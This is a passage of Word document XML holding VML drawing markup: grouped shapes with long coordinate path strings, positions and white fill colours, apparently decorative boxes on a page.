5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2920,5397,2919,5397,2919,5397,2919,5397,2919,5397,2919,5397,2919,5397,2919,5397,2918,5397,2918,5397,2918,5397,2918,5397,2917,5397,2917,5397,2917,5397,2917,5397,2916,5397,2916,5397,2916,5397,2915,5397,2915,5397,2914,5397,2914,5397,2914,5397,2913,5397,2913,5397,2912,5397,2912,5397,2911,5397,2910,5397,2910,5397,2909,5397,2909,5397,2908,5397,2907,5397,2907,5397,2906,5397,2905,5397,2904,5397,2903,5397,2903,5397,2902,5397,2901,5397,2900,5397,2899,5397,2898,5397,2897,5397,2896,5397,2895,5397,2894,5397,2893,5397,2892,5397,2890,5397,2889,5397,2888,5397,2887,5397,2885,5397,2884,5397,2883,5397,2881,5397,2880,5397,2878,5397,2877,5397,2875,5397,2874,5397,2872,5397,2870,5397,2869,5397,2867,5397,2865,5397,2863,5397,2861,5397,2859,5397,2857,5397,2855,5397,2853,5397,2851,5397,2849,5397,2847,5397,2845,5397,2843,5397,2840,5397,2838,5397,2836,5397,2833,5397,2831,5397,2828,5397,2826,5397,2823,5397,2820,5397,2818,5397,2815,5397,2812,5397,2809,5397,2806,5397,2803,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5397,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5396,2800,5395,2800,5395,2800,5395,2800,5395,2800,5394,2800,5394,2800,5394,2800,5393,2800,5393,2800,5393,2800,5392,2800,5392,2800,5391,2800,5391,2800,5390,2800,5390,2800,5389,2800,5388,2800,5388,2800,5387,2800,5386,2800,5385,2800,5385,2800,5384,2800,5383,2800,5382,2800,5381,2800,5380,2800,5379,2800,5378,2800,5377,2800,5375,2800,5374,2800,5373,2800,5372,2800,5370,2800,5369,2800,5367,2800,5366,2800,5364,2800,5362,2800,5361,2800,5359,2800,5357,2800,5355,2800,5353,2800,5351,2800,5349,2800,5347,2800,5345,2800,5343,2800,5340,2800,5338,2800,5335,2800,5333,2800,5330,2800,5328,2800,5325,2800,5322,2800,5319,2800,5316,2800,5313,2800,5310,2800,5307,2800,5304,2800,5300,2800,5297,2800,5294,2800,5290,2800,5286,2800,5283,2800,5279,2800,5275,2800,5271,2800,5267,2800,5263,2800,5259,2800,5254,2800,5250,2800,5245,2800,5241,2800,5236,2800,5231,2800,5226,2800,5221,2800,5216,2800,5211,2800,5206,2800,5201,2800,5195,2800,5190,2800,5184,2800,5178,2800,5172,2800,5166,2800,5160,2800,5154,2800,5148,2800,5142e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:288.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,5770" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:5770;width:130;height:270" coordorigin="2790,5770" coordsize="130,270" path="m2800,5787l2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2801,5787,2802,5787,2802,5787,2802,5787,2802,5787,2802,5787,2802,5787,2803,5787,2803,5787,2803,5787,2803,5787,2803,5787,2804,5787,2804,5787,2804,5787,2805,5787,2805,5787,2805,5787,2806,5787,2806,5787,2806,5787,2807,5787,2807,5787,2808,5787,2808,5787,2809,5787,2809,5787,2810,5787,2810,5787,2811,5787,2812,5787,2812,5787,2813,5787,2814,5787,2814,5787,2815,5787,2816,5787,2817,5787,2817,5787,2818,5787,2819,5787,2820,5787,2821,5787,2822,5787,2823,5787,2824,5787,2825,5787,2826,5787,2827,5787,2828,5787,2829,5787,2830,5787,2832,5787,2833,5787,2834,5787,2836,5787,2837,5787,2838,5787,2840,5787,2841,5787,2843,5787,2844,5787,2846,5787,2847,5787,2849,5787,2851,5787,2852,5787,2854,5787,2856,5787,2858,5787,2860,5787,2861,5787,2863,5787,2865,5787,2867,5787,2870,5787,2872,5787,2874,5787,2876,5787,2878,5787,2881,5787,2883,5787,2885,5787,2888,5787,2890,5787,2893,5787,2895,5787,2898,5787,2901,5787,2903,5787,2906,5787,2909,5787,2912,5787,2915,5787,2917,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5787,2920,5788,2920,5788,2920,5788,2920,5788,2920,5788,2920,5788,2920,5789,2920,5789,2920,5789,2920,5789,2920,5790,2920,5790,2920,5790,2920,5791,2920,5791,2920,5791,2920,5792,2920,5792,2920,5793,2920,5793,2920,5794,2920,5795,2920,5795,2920,5796,2920,5797,2920,5797,2920,5798,2920,5799,2920,5800,2920,5801,2920,5802,2920,5803,2920,5804,2920,5805,2920,5806,2920,5807,2920,5808,2920,5809,2920,5811,2920,5812,2920,5814,2920,5815,2920,5816,2920,5818,2920,5820,2920,5821,2920,5823,2920,5825,2920,5827,2920,5828,2920,5830,2920,5832,2920,5835,2920,5837,2920,5839,2920,5841,2920,5843,2920,5846,2920,5848,2920,5851,2920,5853,2920,5856,2920,5859,2920,5862,2920,5864,2920,5867,2920,5870,2920,5873,2920,5877,2920,5880,2920,5883,2920,5887,2920,5890,2920,5894,2920,5897,2920,5901,2920,5905,2920,5909,2920,5913,2920,5917,2920,5921,2920,5925,2920,5929,2920,5934,2920,5938,2920,5943,2920,5948,2920,5952,2920,5957,2920,5962,2920,5967,2920,5972,2920,5978,2920,5983,2920,5988,2920,5994,2920,6000,2920,6005,2920,6011,2920,6017,2920,6023,2920,6029,2920,6036,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2920,6042,2919,6042,2919,6042,2919,6042,2919,6042,2919,6042,2919,6042,2919,6042,2918,6042,2918,6042,2918,6042,2918,6042,2917,6042,2917,6042,2917,6042,2917,6042,2916,6042,2916,6042,2916,6042,2915,6042,2915,6042,2914,6042,2914,6042,2914,6042,2913,6042,2913,6042,2912,6042,2912,6042,2911,6042,2910,6042,2910,6042,2909,6042,2909,6042,2908,6042,2907,6042,2907,6042,2906,6042,2905,6042,2904,6042,2903,6042,2903,6042,2902,6042,2901,6042,2900,6042,2899,6042,2898,6042,2897,6042,2896,6042,2895,6042,2894,6042,2893,6042,2892,6042,2890,6042,2889,6042,2888,6042,2887,6042,2885,6042,2884,6042,2883,6042,2881,6042,2880,6042,2878,6042,2877,6042,2875,6042,2874,6042,2872,6042,2870,6042,2869,6042,2867,6042,2865,6042,2863,6042,2861,6042,2859,6042,2857,6042,2855,6042,2853,6042,2851,6042,2849,6042,2847,6042,2845,6042,2843,6042,2840,6042,2838,6042,2836,6042,2833,6042,2831,6042,2828,6042,2826,6042,2823,6042,2820,6042,2818,6042,2815,6042,2812,6042,2809,6042,2806,6042,2803,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6041,2800,6041,2800,6041,2800,6041,2800,6041,2800,6041,2800,6040,2800,6040,2800,6040,2800,6040,2800,6039,2800,6039,2800,6039,2800,6038,2800,6038,2800,6038,2800,6037,2800,6037,2800,6036,2800,6036,2800,6035,2800,6034,2800,6034,2800,6033,2800,6032,2800,6032,2800,6031,2800,6030,2800,6029,2800,6028,2800,6027,2800,6026,2800,6025,2800,6024,2800,6023,2800,6022,2800,6021,2800,6020,2800,6018,2800,6017,2800,6015,2800,6014,2800,6013,2800,6011,2800,6009,2800,6008,2800,6006,2800,6004,2800,6002,2800,6000,2800,5999,2800,5997,2800,5994,2800,5992,2800,5990,2800,5988,2800,5986,2800,5983,2800,5981,2800,5978,2800,5976,2800,5973,2800,5970,2800,5967,2800,5965,2800,5962,2800,5959,2800,5955,2800,5952,2800,5949,2800,5946,2800,5942,2800,5939,2800,5935,2800,5932,2800,5928,2800,5924,2800,5920,2800,5916,2800,5912,2800,5908,2800,5904,2800,5900,2800,5895,2800,5891,2800,5886,2800,5881,2800,5877,2800,5872,2800,5867,2800,5862,2800,5857,2800,5851,2800,5846,2800,5841,2800,5835,2800,5829,2800,5824,2800,5818,2800,5812,2800,5806,2800,5800,2800,5793,2800,5787e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:6390;width:130;height:270" coordorigin="2790,6390" coordsize="130,270" path="m2800,6417l2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2802,6417,2802,6417,2802,6417,2802,6417,2802,6417,2802,6417,2803,6417,2803,6417,2803,6417,2803,6417,2803,6417,2804,6417,2804,6417,2804,6417,2805,6417,2805,6417,2805,6417,2806,6417,2806,6417,2806,6417,2807,6417,2807,6417,2808,6417,2808,6417,2809,6417,2809,6417,2810,6417,2810,6417,2811,6417,2812,6417,2812,6417,2813,6417,2814,6417,2814,6417,2815,6417,2816,6417,2817,6417,2817,6417,2818,6417,2819,6417,2820,6417,2821,6417,2822,6417,2823,6417,2824,6417,2825,6417,2826,6417,2827,6417,2828,6417,2829,6417,2830,6417,2832,6417,2833,6417,2834,6417,2836,6417,2837,6417,2838,6417,2840,6417,2841,6417,2843,6417,2844,6417,2846,6417,2847,6417,2849,6417,2851,6417,2852,6417,2854,6417,2856,6417,2858,6417,2860,6417,2861,6417,2863,6417,2865,6417,2867,6417,2870,6417,2872,6417,2874,6417,2876,6417,2878,6417,2881,6417,2883,6417,2885,6417,2888,6417,2890,6417,2893,6417,2895,6417,2898,6417,2901,6417,2903,6417,2906,6417,2909,6417,2912,6417,2915,6417,2917,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6419,2920,6419,2920,6419,2920,6419,2920,6420,2920,6420,2920,6420,2920,6421,2920,6421,2920,6421,2920,6422,2920,6422,2920,6423,2920,6423,2920,6424,2920,6424,2920,6425,2920,6426,2920,6426,2920,6427,2920,6428,2920,6428,2920,6429,2920,6430,2920,6431,2920,6432,2920,6433,2920,6434,2920,6435,2920,6436,2920,6437,2920,6439,2920,6440,2920,6441,2920,6442,2920,6444,2920,6445,2920,6447,2920,6448,2920,6450,2920,6452,2920,6453,2920,6455,2920,6457,2920,6459,2920,6461,2920,6463,2920,6465,2920,6467,2920,6469,2920,6471,2920,6474,2920,6476,2920,6479,2920,6481,2920,6484,2920,6486,2920,6489,2920,6492,2920,6495,2920,6498,2920,6501,2920,6504,2920,6507,2920,6510,2920,6514,2920,6517,2920,6520,2920,6524,2920,6528,2920,6531,2920,6535,2920,6539,2920,6543,2920,6547,2920,6551,2920,6555,2920,6560,2920,6564,2920,6569,2920,6573,2920,6578,2920,6583,2920,6588,2920,6592,2920,6598,2920,6603,2920,6608,2920,6613,2920,6619,2920,6624,2920,6630,2920,6636,2920,6642,2920,6647,2920,6654,2920,6660,2920,6666,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2918,6672,2918,6672,2918,6672,2918,6672,2917,6672,2917,6672,2917,6672,2917,6672,2916,6672,2916,6672,2916,6672,2915,6672,2915,6672,2914,6672,2914,6672,2914,6672,2913,6672,2913,6672,2912,6672,2912,6672,2911,6672,2910,6672,2910,6672,2909,6672,2909,6672,2908,6672,2907,6672,2907,6672,2906,6672,2905,6672,2904,6672,2903,6672,2903,6672,2902,6672,2901,6672,2900,6672,2899,6672,2898,6672,2897,6672,2896,6672,2895,6672,2894,6672,2893,6672,2892,6672,2890,6672,2889,6672,2888,6672,2887,6672,2885,6672,2884,6672,2883,6672,2881,6672,2880,6672,2878,6672,2877,6672,2875,6672,2874,6672,2872,6672,2870,6672,2869,6672,2867,6672,2865,6672,2863,6672,2861,6672,2859,6672,2857,6672,2855,6672,2853,6672,2851,6672,2849,6672,2847,6672,2845,6672,2843,6672,2840,6672,2838,6672,2836,6672,2833,6672,2831,6672,2828,6672,2826,6672,2823,6672,2820,6672,2818,6672,2815,6672,2812,6672,2809,6672,2806,6672,2803,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6671,2800,6671,2800,6671,2800,6671,2800,6671,2800,6671,2800,6670,2800,6670,2800,6670,2800,6669,2800,6669,2800,6669,2800,6668,2800,6668,2800,6667,2800,6667,2800,6666,2800,6666,2800,6665,2800,6665,2800,6664,2800,6663,2800,6663,2800,6662,2800,6661,2800,6660,2800,6659,2800,6659,2800,6658,2800,6657,2800,6656,2800,6655,2800,6653,2800,6652,2800,6651,2800,6650,2800,6649,2800,6647,2800,6646,2800,6644,2800,6643,2800,6641,2800,6640,2800,6638,2800,6636,2800,6635,2800,6633,2800,6631,2800,6629,2800,6627,2800,6625,2800,6623,2800,6620,2800,6618,2800,6616,2800,6613,2800,6611,2800,6608,2800,6606,2800,6603,2800,6601,2800,6598,2800,6595,2800,6592,2800,6589,2800,6586,2800,6583,2800,6579,2800,6576,2800,6573,2800,6569,2800,6566,2800,6562,2800,6558,2800,6554,2800,6551,2800,6547,2800,6543,2800,6538,2800,6534,2800,6530,2800,6525,2800,6521,2800,6516,2800,6512,2800,6507,2800,6502,2800,6497,2800,6492,2800,6487,2800,6482,2800,6476,2800,6471,2800,6465,2800,6460,2800,6454,2800,6448,2800,6442,2800,6436,2800,6430,2800,6424,2800,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:2790;top:7050;width:130;height:250" coordorigin="2790,7050" coordsize="130,250" path="m2800,7063l2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2802,7063,2802,7063,2802,7063,2802,7063,2802,7063,2802,7063,2803,7063,2803,7063,2803,7063,2803,7063,2803,7063,2804,7063,2804,7063,2804,7063,2805,7063,2805,7063,2805,7063,2806,7063,2806,7063,2806,7063,2807,7063,2807,7063,2808,7063,2808,7063,2809,7063,2809,7063,2810,7063,2810,7063,2811,7063,2812,7063,2812,7063,2813,7063,2814,7063,2814,7063,2815,7063,2816,7063,2817,7063,2817,7063,2818,7063,2819,7063,2820,7063,2821,7063,2822,7063,2823,7063,2824,7063,2825,7063,2826,7063,2827,7063,2828,7063,2829,7063,2830,7063,2832,7063,2833,7063,2834,7063,2836,7063,2837,7063,2838,7063,2840,7063,2841,7063,2843,7063,2844,7063,2846,7063,2847,7063,2849,7063,2851,7063,2852,7063,2854,7063,2856,7063,2858,7063,2860,7063,2861,7063,2863,7063,2865,7063,2867,7063,2870,7063,2872,7063,2874,7063,2876,7063,2878,7063,2881,7063,2883,7063,2885,7063,2888,7063,2890,7063,2893,7063,2895,7063,2898,7063,2901,7063,2903,7063,2906,7063,2909,7063,2912,7063,2915,7063,2917,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7064,2920,7064,2920,7064,2920,7064,2920,7064,2920,7065,2920,7065,2920,7065,2920,7066,2920,7066,2920,7066,2920,7067,2920,7067,2920,7068,2920,7068,2920,7069,2920,7069,2920,7070,2920,7070,2920,7071,2920,7072,2920,7072,2920,7073,2920,7074,2920,7075,2920,7075,2920,7076,2920,7077,2920,7078,2920,7079,2920,7080,2920,7081,2920,7083,2920,7084,2920,7085,2920,7086,2920,7088,2920,7089,2920,7091,2920,7092,2920,7094,2920,7095,2920,7097,2920,7099,2920,7100,2920,7102,2920,7104,2920,7106,2920,7108,2920,7110,2920,7112,2920,7114,2920,7117,2920,7119,2920,7121,2920,7124,2920,7126,2920,7129,2920,7132,2920,7134,2920,7137,2920,7140,2920,7143,2920,7146,2920,7149,2920,7152,2920,7156,2920,7159,2920,7162,2920,7166,2920,7169,2920,7173,2920,7177,2920,7180,2920,7184,2920,7188,2920,7192,2920,7197,2920,7201,2920,7205,2920,7209,2920,7214,2920,7219,2920,7223,2920,7228,2920,7233,2920,7238,2920,7243,2920,7248,2920,7253,2920,7259,2920,7264,2920,7270,2920,7275,2920,7281,2920,7287,2920,7293,2920,7299,2920,7305,2920,7311,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2918,7318,2918,7318,2918,7318,2918,7318,2917,7318,2917,7318,2917,7318,2917,7318,2916,7318,2916,7318,2916,7318,2915,7318,2915,7318,2914,7318,2914,7318,2914,7318,2913,7318,2913,7318,2912,7318,2912,7318,2911,7318,2910,7318,2910,7318,2909,7318,2909,7318,2908,7318,2907,7318,2907,7318,2906,7318,2905,7318,2904,7318,2903,7318,2903,7318,2902,7318,2901,7318,2900,7318,2899,7318,2898,7318,2897,7318,2896,7318,2895,7318,2894,7318,2893,7318,2892,7318,2890,7318,2889,7318,2888,7318,2887,7318,2885,7318,2884,7318,2883,7318,2881,7318,2880,7318,2878,7318,2877,7318,2875,7318,2874,7318,2872,7318,2870,7318,2869,7318,2867,7318,2865,7318,2863,7318,2861,7318,2859,7318,2857,7318,2855,7318,2853,7318,2851,7318,2849,7318,2847,7318,2845,7318,2843,7318,2840,7318,2838,7318,2836,7318,2833,7318,2831,7318,2828,7318,2826,7318,2823,7318,2820,7318,2818,7318,2815,7318,2812,7318,2809,7318,2806,7318,2803,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7316,2800,7316,2800,7316,2800,7316,2800,7316,2800,7315,2800,7315,2800,7315,2800,7314,2800,7314,2800,7314,2800,7313,2800,7313,2800,7312,2800,7312,2800,7311,2800,7311,2800,7310,2800,7309,2800,7309,2800,7308,2800,7307,2800,7306,2800,7306,2800,7305,2800,7304,2800,7303,2800,7302,2800,7301,2800,7300,2800,7299,2800,7298,2800,7296,2800,7295,2800,7294,2800,7292,2800,7291,2800,7290,2800,7288,2800,7287,2800,7285,2800,7283,2800,7282,2800,7280,2800,7278,2800,7276,2800,7274,2800,7272,2800,7270,2800,7268,2800,7266,2800,7263,2800,7261,2800,7259,2800,7256,2800,7254,2800,7251,2800,7249,2800,7246,2800,7243,2800,7240,2800,7237,2800,7234,2800,7231,2800,7228,2800,7225,2800,7221,2800,7218,2800,7215,2800,7211,2800,7207,2800,7204,2800,7200,2800,7196,2800,7192,2800,7188,2800,7184,2800,7180,2800,7175,2800,7171,2800,7166,2800,7162,2800,7157,2800,7152,2800,7147,2800,7142,2800,7137,2800,7132,2800,7127,2800,7122,2800,7116,2800,7111,2800,7105,2800,7099,2800,7093,2800,7087,2800,7081,2800,7075,2800,7069,2800,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:383.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,7670" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:7670;width:130;height:270" coordorigin="2790,7670" coordsize="130,270" path="m2800,7693l2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2802,7693,2802,7693,2802,7693,2802,7693,2802,7693,2802,7693,2803,7693,2803,7693,2803,7693,2803,7693,2803,7693,2804,7693,2804,7693,2804,7693,2805,7693,2805,7693,2805,7693,2806,7693,2806,7693,2806,7693,2807,7693,2807,7693,2808,7693,2808,7693,2809,7693,2809,7693,2810,7693,2810,7693,2811,7693,2812,7693,2812,7693,2813,7693,2814,7693,2814,7693,2815,7693,2816,7693,2817,7693,2817,7693,2818,7693,2819,7693,2820,7693,2821,7693,2822,7693,2823,7693,2824,7693,2825,7693,2826,7693,2827,7693,2828,7693,2829,7693,2830,7693,2832,7693,2833,7693,2834,7693,2836,7693,2837,7693,2838,7693,2840,7693,2841,7693,2843,7693,2844,7693,2846,7693,2847,7693,2849,7693,2851,7693,2852,7693,2854,7693,2856,7693,2858,7693,2860,7693,2861,7693,2863,7693,2865,7693,2867,7693,2870,7693,2872,7693,2874,7693,2876,7693,2878,7693,2881,7693,2883,7693,2885,7693,2888,7693,2890,7693,2893,7693,2895,7693,2898,7693,2901,7693,2903,7693,2906,7693,2909,7693,2912,7693,2915,7693,2917,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7694,2920,7694,2920,7694,2920,7694,2920,7694,2920,7694,2920,7695,2920,7695,2920,7695,2920,7696,2920,7696,2920,7696,2920,7697,2920,7697,2920,7697,2920,7698,2920,7698,2920,7699,2920,7699,2920,7700,2920,7701,2920,7701,2920,7702,2920,7703,2920,7703,2920,7704,2920,7705,2920,7706,2920,7707,2920,7708,2920,7709,2920,7710,2920,7711,2920,7712,2920,7713,2920,7714,2920,7715,2920,7717,2920,7718,2920,7719,2920,7721,2920,7722,2920,7724,2920,7726,2920,7727,2920,7729,2920,7731,2920,7733,2920,7734,2920,7736,2920,7738,2920,7740,2920,7743,2920,7745,2920,7747,2920,7749,2920,7752,2920,7754,2920,7757,2920,7759,2920,7762,2920,7765,2920,7768,2920,7770,2920,7773,2920,7776,2920,7779,2920,7783,2920,7786,2920,7789,2920,7793,2920,7796,2920,7800,2920,7803,2920,7807,2920,7811,2920,7815,2920,7819,2920,7823,2920,7827,2920,7831,2920,7835,2920,7840,2920,7844,2920,7849,2920,7854,2920,7858,2920,7863,2920,7868,2920,7873,2920,7878,2920,7884,2920,7889,2920,7894,2920,7900,2920,7906,2920,7911,2920,7917,2920,7923,2920,7929,2920,7935,2920,7942,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2918,7948,2918,7948,2918,7948,2918,7948,2917,7948,2917,7948,2917,7948,2917,7948,2916,7948,2916,7948,2916,7948,2915,7948,2915,7948,2914,7948,2914,7948,2914,7948,2913,7948,2913,7948,2912,7948,2912,7948,2911,7948,2910,7948,2910,7948,2909,7948,2909,7948,2908,7948,2907,7948,2907,7948,2906,7948,2905,7948,2904,7948,2903,7948,2903,7948,2902,7948,2901,7948,2900,7948,2899,7948,2898,7948,2897,7948,2896,7948,2895,7948,2894,7948,2893,7948,2892,7948,2890,7948,2889,7948,2888,7948,2887,7948,2885,7948,2884,7948,2883,7948,2881,7948,2880,7948,2878,7948,2877,7948,2875,7948,2874,7948,2872,7948,2870,7948,2869,7948,2867,7948,2865,7948,2863,7948,2861,7948,2859,7948,2857,7948,2855,7948,2853,7948,2851,7948,2849,7948,2847,7948,2845,7948,2843,7948,2840,7948,2838,7948,2836,7948,2833,7948,2831,7948,2828,7948,2826,7948,2823,7948,2820,7948,2818,7948,2815,7948,2812,7948,2809,7948,2806,7948,2803,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7946,2800,7946,2800,7946,2800,7946,2800,7945,2800,7945,2800,7945,2800,7944,2800,7944,2800,7943,2800,7943,2800,7943,2800,7942,2800,7942,2800,7941,2800,7940,2800,7940,2800,7939,2800,7938,2800,7938,2800,7937,2800,7936,2800,7935,2800,7934,2800,7933,2800,7932,2800,7931,2800,7930,2800,7929,2800,7928,2800,7927,2800,7925,2800,7924,2800,7923,2800,7921,2800,7920,2800,7918,2800,7917,2800,7915,2800,7914,2800,7912,2800,7910,2800,7908,2800,7906,2800,7904,2800,7902,2800,7900,2800,7898,2800,7896,2800,7894,2800,7891,2800,7889,2800,7887,2800,7884,2800,7882,2800,7879,2800,7876,2800,7873,2800,7870,2800,7868,2800,7865,2800,7861,2800,7858,2800,7855,2800,7852,2800,7848,2800,7845,2800,7841,2800,7838,2800,7834,2800,7830,2800,7826,2800,7822,2800,7818,2800,7814,2800,7810,2800,7806,2800,7801,2800,7797,2800,7792,2800,7787,2800,7783,2800,7778,2800,7773,2800,7768,2800,7763,2800,7757,2800,7752,2800,7746,2800,7741,2800,7735,2800,7730,2800,7724,2800,7718,2800,7712,2800,7706,2800,7699,2800,7693e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:415.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,8310" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:8310;width:130;height:270" coordorigin="2790,8310" coordsize="130,270" path="m2800,8338l2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2802,8338,2802,8338,2802,8338,2802,8338,2802,8338,2802,8338,2803,8338,2803,8338,2803,8338,2803,8338,2803,8338,2804,8338,2804,8338,2804,8338,2805,8338,2805,8338,2805,8338,2806,8338,2806,8338,2806,8338,2807,8338,2807,8338,2808,8338,2808,8338,2809,8338,2809,8338,2810,8338,2810,8338,2811,8338,2812,8338,2812,8338,2813,8338,2814,8338,2814,8338,2815,8338,2816,8338,2817,8338,2817,8338,2818,8338,2819,8338,2820,8338,2821,8338,2822,8338,2823,8338,2824,8338,2825,8338,2826,8338,2827,8338,2828,8338,2829,8338,2830,8338,2832,8338,2833,8338,2834,8338,2836,8338,2837,8338,2838,8338,2840,8338,2841,8338,2843,8338,2844,8338,2846,8338,2847,8338,2849,8338,2851,8338,2852,8338,2854,8338,2856,8338,2858,8338,2860,8338,2861,8338,2863,8338,2865,8338,2867,8338,2870,8338,2872,8338,2874,8338,2876,8338,2878,8338,2881,8338,2883,8338,2885,8338,2888,8338,2890,8338,2893,8338,2895,8338,2898,8338,2901,8338,2903,8338,2906,8338,2909,8338,2912,8338,2915,8338,2917,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2